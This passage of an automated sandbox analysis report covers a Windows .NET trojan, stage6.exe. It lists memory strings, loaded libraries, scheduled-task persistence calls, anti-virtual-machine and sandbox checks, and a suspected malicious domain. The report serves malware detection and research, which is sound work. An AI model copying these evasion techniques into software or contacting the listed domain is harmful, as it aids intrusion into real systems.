                        Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: stage6.exe, 00000001.00000002.1379141192.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, stage6.exe, 00000001.00000002.1379141192.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                        Source: stage6.exe, 00000001.00000002.1379141192.0000000000C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 23.52.218.12:443 -> 192.168.2.4:49722 version: TLS 1.2
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,1_2_004329C0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,1_2_004329C0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 0_2_0670EA480_2_0670EA48
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 0_2_0670DF900_2_0670DF90
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 0_2_066F00400_2_066F0040
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 0_2_066F00060_2_066F0006
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004088501_2_00408850
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0040ACF01_2_0040ACF0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004238601_2_00423860
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004388101_2_00438810
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041682D1_2_0041682D
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004288CB1_2_004288CB
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043D8801_2_0043D880
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004218A01_2_004218A0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004309401_2_00430940
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004039701_2_00403970
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004209391_2_00420939
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004179C11_2_004179C1
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004231C21_2_004231C2
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004241C01_2_004241C0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043B1D01_2_0043B1D0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004291DD1_2_004291DD
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043D9801_2_0043D980
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004059901_2_00405990
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004221901_2_00422190
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043D9971_2_0043D997
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043D9991_2_0043D999
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004091B01_2_004091B0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042CA491_2_0042CA49
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042DA531_2_0042DA53
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004162631_2_00416263
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0040EA101_2_0040EA10
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004152201_2_00415220
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042CAD01_2_0042CAD0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004252DD1_2_004252DD
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041B2E01_2_0041B2E0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004062801_2_00406280
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043DA801_2_0043DA80
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041E2901_2_0041E290
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041CB401_2_0041CB40
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043D34D1_2_0043D34D
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00426B501_2_00426B50
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043DB601_2_0043DB60
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00436B081_2_00436B08
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042830D1_2_0042830D
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042CB111_2_0042CB11
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004043201_2_00404320
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042CB221_2_0042CB22
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004253271_2_00425327
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004083301_2_00408330
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043F3301_2_0043F330
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042A33F1_2_0042A33F
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0040DBD91_2_0040DBD9
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004243801_2_00424380
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041FC751_2_0041FC75
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041DC001_2_0041DC00
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00429C2B1_2_00429C2B
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004291DD1_2_004291DD
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004074F01_2_004074F0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041148F1_2_0041148F
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042AC901_2_0042AC90
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043ECA01_2_0043ECA0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0040CD461_2_0040CD46
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004375001_2_00437500
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004225101_2_00422510
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00417DEE1_2_00417DEE
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00437DF01_2_00437DF0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004095801_2_00409580
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041759F1_2_0041759F
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00425E701_2_00425E70
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00436E741_2_00436E74
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004276031_2_00427603
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00425E301_2_00425E30
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004286C01_2_004286C0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043AEC01_2_0043AEC0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004266D01_2_004266D0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004236E21_2_004236E2
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00405EE01_2_00405EE0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041DE801_2_0041DE80
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00402F501_2_00402F50
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00420F501_2_00420F50
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00438F591_2_00438F59
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004067101_2_00406710
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00423F201_2_00423F20
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043F7201_2_0043F720
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00419F301_2_00419F30
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0041E7C01_2_0041E7C0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004197C21_2_004197C2
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0042DFE91_2_0042DFE9
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0040A7801_2_0040A780
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00411F901_2_00411F90
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004187921_2_00418792
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004157991_2_00415799
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043EFB01_2_0043EFB0
                        Source: C:\Users\user\Desktop\stage6.exeCode function: String function: 00408030 appears 42 times
                        Source: C:\Users\user\Desktop\stage6.exeCode function: String function: 00414400 appears 65 times
                        Source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs stage6.exe
                        Source: stage6.exe, 00000000.00000002.1157032298.00000000059F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameChrpggd.dll" vs stage6.exe
                        Source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs stage6.exe
                        Source: stage6.exe, 00000000.00000000.1135979191.0000000001018000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename1.exe$ vs stage6.exe
                        Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs stage6.exe
                        Source: stage6.exe, 00000000.00000002.1144476584.00000000016CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs stage6.exe
                        Source: stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs stage6.exe
                        Source: stage6.exeBinary or memory string: OriginalFilename1.exe$ vs stage6.exe
                        Source: stage6.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: stage6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: stage6.exe, ---.csCryptographic APIs: 'CreateDecryptor'
                        Source: stage6.exe, ---.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@10/2
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00430C70 CoCreateInstance,1_2_00430C70
                        Source: C:\Users\user\Desktop\stage6.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\stage6.exeMutant created: \Sessions\1\BaseNamedObjects\Ruiexf
                        Source: stage6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: stage6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\stage6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: stage6.exeVirustotal: Detection: 59%
                        Source: stage6.exeReversingLabs: Detection: 63%
                        Source: C:\Users\user\Desktop\stage6.exeFile read: C:\Users\user\Desktop\stage6.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\stage6.exe "C:\Users\user\Desktop\stage6.exe"
                        Source: C:\Users\user\Desktop\stage6.exeProcess created: C:\Users\user\Desktop\stage6.exe "C:\Users\user\Desktop\stage6.exe"
                        Source: C:\Users\user\Desktop\stage6.exeProcess created: C:\Users\user\Desktop\stage6.exe "C:\Users\user\Desktop\stage6.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: stage6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: stage6.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: stage6.exeStatic file information: File size 1657856 > 1048576
                        Source: stage6.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x194200
                        Source: stage6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: stage6.exe, 00000000.00000002.1158205855.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: stage6.exe, ---.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 0.2.stage6.exe.5cb0000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 0.2.stage6.exe.5ef0000.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Source: Yara matchFile source: 0.2.stage6.exe.5e20000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1157918429.0000000005E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: stage6.exe PID: 6272, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 0_2_016B0F71 push edx; iretd 0_2_016B0F7B
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 0_2_066F58EC push ebx; retf 0_2_066F58F7
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 0_2_066F35E9 push ds; retf 0_2_066F35EC
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh1_2_0043D812
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_00443469 push ebp; iretd 1_2_0044346C
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0044366E push 9F00CD97h; ret 1_2_004436B1
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h1_2_0043AE3E
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_004477A5 push ebp; iretd 1_2_004477AA
                        Source: stage6.exeStatic PE information: section name: .text entropy: 7.498920761662283
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: stage6.exe PID: 6272, type: MEMORYSTR
                        Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\stage6.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeMemory allocated: 53B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exe TID: 6652Thread sleep time: -150000s >= -30000sJump to behavior
                        Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: stage6.exe, 00000001.00000002.1379141192.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: C:\Users\user\Desktop\stage6.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeCode function: 1_2_0043C1F0 LdrInitializeThunk,1_2_0043C1F0
                        Source: C:\Users\user\Desktop\stage6.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\stage6.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
